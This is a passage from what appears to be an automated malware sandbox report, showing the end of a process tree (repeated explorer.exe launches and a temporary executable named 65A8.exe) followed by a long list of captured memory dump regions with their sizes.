                                                                                                                      2⤵
                                                                                                                        PID:580
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:4740
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4848
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:6036
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:1188
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:4108
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5984
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5916
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5412
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5368
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\65A8.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\65A8.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:3468

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • memory/340-217-0x000001B51D090000-0x000001B51D100000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/520-123-0x0000000002630000-0x0000000002632000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/856-114-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          172KB

                                                                                                                                        • memory/1036-229-0x00000247F60A0000-0x00000247F6110000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1092-227-0x000001442DBD0000-0x000001442DC40000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1144-206-0x00000194BEDC0000-0x00000194BEE30000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1172-194-0x000002595D7A0000-0x000002595D7EB000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          300KB

                                                                                                                                        • memory/1172-197-0x000002595D860000-0x000002595D8D0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1396-211-0x000001DE69B60000-0x000001DE69BD0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1408-193-0x000001B3FEE20000-0x000001B3FEE90000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/1448-126-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          88KB

                                                                                                                                        • memory/1772-146-0x0000000000910000-0x0000000000912000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1772-151-0x0000000000915000-0x0000000000916000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/1772-149-0x0000000000912000-0x0000000000914000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1936-199-0x0000021991E90000-0x0000021991F00000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2112-141-0x00000000025D0000-0x00000000025D2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/2112-150-0x00000000025D5000-0x00000000025D7000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/2112-147-0x00000000025D2000-0x00000000025D4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/2112-148-0x00000000025D4000-0x00000000025D5000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/2416-225-0x00000223B0A00000-0x00000223B0A70000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2448-223-0x000002D38C340000-0x000002D38C3B0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2580-203-0x000001ECF73A0000-0x000001ECF7410000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2696-216-0x0000022B03D00000-0x0000022B03D70000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2708-221-0x0000022088420000-0x0000022088490000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/2880-320-0x0000000000F53000-0x0000000000F54000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/2880-312-0x0000000000F50000-0x0000000000F51000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/2880-313-0x0000000000F52000-0x0000000000F53000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/3056-306-0x0000000004E80000-0x0000000004E95000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          84KB

                                                                                                                                        • memory/3056-303-0x0000000002D40000-0x0000000002D57000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          92KB

                                                                                                                                        • memory/3128-138-0x00000000022E0000-0x00000000022E2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/4064-119-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/4276-192-0x0000000000CA0000-0x0000000000CFC000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          368KB

                                                                                                                                        • memory/4276-189-0x0000000000A70000-0x0000000000B71000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                        • memory/4396-287-0x0000000002C00000-0x0000000002C0C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          48KB

                                                                                                                                        • memory/4400-237-0x0000000003720000-0x0000000003730000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/4400-231-0x0000000003580000-0x0000000003590000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/4448-283-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          48KB

                                                                                                                                        • memory/4496-158-0x0000000000590000-0x00000000005A2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          72KB

                                                                                                                                        • memory/4496-157-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/5012-249-0x000001D3DF200000-0x000001D3DF2FF000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          1020KB

                                                                                                                                        • memory/5012-212-0x000001D3DCAD0000-0x000001D3DCB40000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          448KB

                                                                                                                                        • memory/5192-305-0x0000000000400000-0x0000000002FD0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          43.8MB

                                                                                                                                        • memory/5192-304-0x0000000005130000-0x0000000005A3B000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          9.0MB

                                                                                                                                        • memory/5676-295-0x0000000000400000-0x0000000002BA8000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          39.7MB

                                                                                                                                        • memory/5676-293-0x0000000002BC0000-0x0000000002BC9000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          36KB

                                                                                                                                        • memory/5772-322-0x0000000006942000-0x0000000006943000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5772-321-0x0000000006940000-0x0000000006941000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5816-254-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          64KB

                                                                                                                                        • memory/5816-255-0x00000000007B0000-0x00000000007C2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          72KB

                                                                                                                                        • memory/5896-296-0x0000000006B90000-0x0000000006B91000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-290-0x0000000007410000-0x0000000007411000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-289-0x0000000006AC0000-0x0000000006AC1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-281-0x00000000065A0000-0x00000000065A1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-282-0x00000000065A2000-0x00000000065A3000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-277-0x0000000006BE0000-0x0000000006BE1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-276-0x0000000006420000-0x0000000006421000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-311-0x00000000065A3000-0x00000000065A4000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-298-0x0000000007C60000-0x0000000007C61000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-291-0x0000000007480000-0x0000000007481000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-292-0x00000000074F0000-0x00000000074F1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/5896-297-0x0000000007C10000-0x0000000007C11000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB